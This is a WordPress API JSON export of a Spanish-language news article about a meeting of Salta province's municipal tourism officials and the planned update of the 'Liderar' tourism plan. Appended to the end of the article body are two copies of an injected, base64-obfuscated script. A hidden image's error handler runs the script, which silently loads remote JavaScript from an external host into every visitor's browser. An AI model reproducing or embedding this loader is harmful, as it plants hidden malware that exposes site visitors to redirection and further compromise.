{"id":3914,"date":"2024-04-08T18:49:05","date_gmt":"2024-04-08T21:49:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3914"},"modified":"2025-08-13T23:57:25","modified_gmt":"2025-08-14T02:57:25","slug":"se-actualizara-el-plan-liderar-en-un-trabajo-federal-y-participativo-con-municipios-y-el-sector-privado","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3914","title":{"rendered":"Se actualizar\u00e1 el Plan Liderar en un trabajo federal y participativo con municipios y el sector privado"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-4037b966ef8825f9ff15d689afffcded\" style=\"background-color:#890224\"><em>Se convoc\u00f3 a un encuentro de directores de turismo al que asistieron referentes de m\u00e1s de 40 municipios para fortalecer el trabajo que se realiza e iniciar la actualizaci\u00f3n del plan estrat\u00e9gico con el objetivo del crecimiento del destino.<\/em><\/h4>\n\n\n\n<p>El III Encuentro Provincial de Referentes Municipales de Turismo se desarroll\u00f3 el mi\u00e9rcoles con la participaci\u00f3n de 41 municipios. El acto de apertura estuvo encabezado por el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, que consider\u00f3 estos encuentros de todos los a\u00f1os, \u201cuna oportunidad para encontrarnos, dialogar y tomar el compromiso de trabajar juntos con la firme decisi\u00f3n pol\u00edtica de nuestro Gobernador de que seamos federales, estando presentes en cada uno de los municipios\u201d.<\/p>\n\n\n\n<p>El funcionario provincial manifest\u00f3 \u201ccada regi\u00f3n tiene sus caracter\u00edsticas geogr\u00e1ficas, culturales y situaciones diferentes y de ah\u00ed la importancia de poder ayudarnos entre todos, de trabajar en conjunto para que el turismo siga creciendo y aumentar el pernocte de quienes nos visitan\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11553-se-actualizara-el-plan-liderar-en-un-trabajo-federal-y-participativo-con-municipios-y-el-sector-privado.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11553-se-actualizara-el-plan-liderar-en-un-trabajo-federal-y-participativo-con-municipios-y-el-sector-privado.jpg\" alt=\"Se actualizar\u00e1 el Plan Liderar en un trabajo federal y participativo con municipios y el sector privado\" style=\"width:336px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>Durante la jornada la secretaria de Turismo, Nadia Loza present\u00f3 el Plan Estrat\u00e9gico de Turismo de Salta \u201cLiderar\u201d y los resultados principales logrados en los \u00faltimos a\u00f1os y anunci\u00f3, en este marco, que en los pr\u00f3ximos d\u00edas iniciar\u00e1 la actualizaci\u00f3n del Plan. \u201cDada la coyuntura, los cambios en las tendencias del mercado y los h\u00e1bitos de consumo, es necesario redefinir objetivos y establecer estrategias priorizadas por regi\u00f3n, para lo que iniciaremos un trabajo territorial que facilite el di\u00e1logo sectorial\u201d.<\/p>\n\n\n\n<p>En tanto, el presidente de la C\u00e1mara de Turismo Juan Lucero destac\u00f3 \u201cnos enorgullece ver a representantes de tantos municipios reunidos y el trabajo que vienen haciendo en cada uno de sus lugares con nuevas actividades, emprendimientos hoteleros y gastron\u00f3micos. Estoy convencido que el turismo en Salta va a crecer de la mano del interior, encuentros de este tipo no son tan frecuentes en el pa\u00eds y debemos aprovecharlos\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11554-plan-liderar.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11554-plan-liderar.jpg\" alt=\"Plan Liderar\" style=\"width:289px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>El encuentro como objetivo actualizar conocimientos e instrumentos que mejoren las acciones y capacidad de gesti\u00f3n del turismo en las diferentes localidades fortaleciendo los procesos de articulaci\u00f3n y compromisos compartidos entre Gobierno Provincial-Municipal, como as\u00ed tambi\u00e9n facilitar la interacci\u00f3n de los nuevos gestores municipales del turismo entre s\u00ed y con las autoridades del Ministerio de Turismo y Deportes.<\/p>\n\n\n\n<p>Luego del anuncio de la secretaria Loza, las autoridades de cada una de las direcciones del Ministerio de Turismo y Deportes presentaron aspectos principales y puntos de apoyo que pueden servir a los gobiernos municipales: Experiencias Tur\u00edsticas, Competitividad y Emprendedurismo, Control de Servicios Tur\u00edsticos, Formaci\u00f3n y Calidad Tur\u00edstica, Promoci\u00f3n Tur\u00edstica. Prensa y Comunicaci\u00f3n, Articulaci\u00f3n con Destinos Tur\u00edsticos y Casa de Salta.&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11555-plan.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11555-plan.jpg\" alt=\"Plan\" style=\"width:343px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En la oportunidad la secretaria de Cultura y Turismo de Tartagal, Claudia S\u00e1nchez manifest\u00f3 \u201ces un placer reencontramos para iniciar este nuevo a\u00f1o, conocer las pol\u00edticas del Gobierno de Salta y bajarlas a cada uno de los municipios para que podamos trabajar articuladamente sobre todo con aquellos municipios que apostamos al desarrollo tur\u00edstico como es el caso de todos los que integramos la regi\u00f3n Selva de Monta\u00f1a\u201d.<\/p>\n\n\n\n<p>En tanto el director de Turismo de Salvador Mazza, Jos\u00e9 Antonio Belmont dijo \u201chemos podido conocer el esquema de trabajo que tienen las diferentes \u00e1reas del Ministerio y estamos muy agradecidos con la predisposici\u00f3n de todos y muy complacidos de saber que contamos con todos los elementos necesarios para trabajar\u201d.<\/p>\n\n\n\n<p>Asimismo, la secretaria de Turismo y Cultura de Seclant\u00e1s, Mar\u00eda Fernanda Funes Arias destac\u00f3 que \u201cfue una gran oportunidad para conocer en detalle el Plan Liderar y conocernos, conectarnos y articular con los referentes de turismo de los otros municipios\u201d.<\/p>\n\n\n\n<p>Al finalizar el encuentro se desarrollaron mesas de trabajo para que los referentes de turismo puedan intercambiar dudas e inquietudes.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/11556-plan.jpg\" alt=\"\" style=\"width:435px;height:auto\"\/><\/figure><\/div>\n\n\n<p>Participaron representantes de Cerrillos, San Lorenzo, Seclant\u00e1s, El Jard\u00edn, La Poma, La Vi\u00f1a, Rosario de la Frontera, El Carril, Campo Quijano. Coronel Moldes, Gral Ballivi\u00e1n, Or\u00e1n, Embarcaci\u00f3n, Urundel, General Mosconi, Las Lajitas, Vaqueros, Ciudad de Salta, Rosario de Lerma, Apolinario Saravia y Nazareno.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron presentes referentes de Chicoana, Molinos, General Pizarro, San Carlos, Cachi, La Candelaria, El Galp\u00f3n, Animan\u00e1, La Vi\u00f1a, Met\u00e1n, Gral. G\u00fcemes, Salvador Mazza, Iruya, Tartagal, Aguaray, Cafayate, San Antonio de los Cobres, El Tala, Tolar Grande y La Caldera.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Se actualizar\u00e1 el Plan Liderar en un trabajo federal y participativo con municipios y sector privado\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/RHzoCUdT-xU?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se convoc\u00f3 a un encuentro de directores de turismo al que asistieron referentes de m\u00e1s de 40 municipios para fortalecer el trabajo que se realiza e iniciar la actualizaci\u00f3n del plan estrat\u00e9gico con el objetivo del crecimiento del destino. El III Encuentro Provincial de Referentes Municipales de Turismo se desarroll\u00f3 el mi\u00e9rcoles con la participaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3915,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-3914","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3914"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3914"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3914\/revisions"}],"predecessor-version":[{"id":6807,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3914\/revisions\/6807"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3915"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3914"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3914"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3914"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}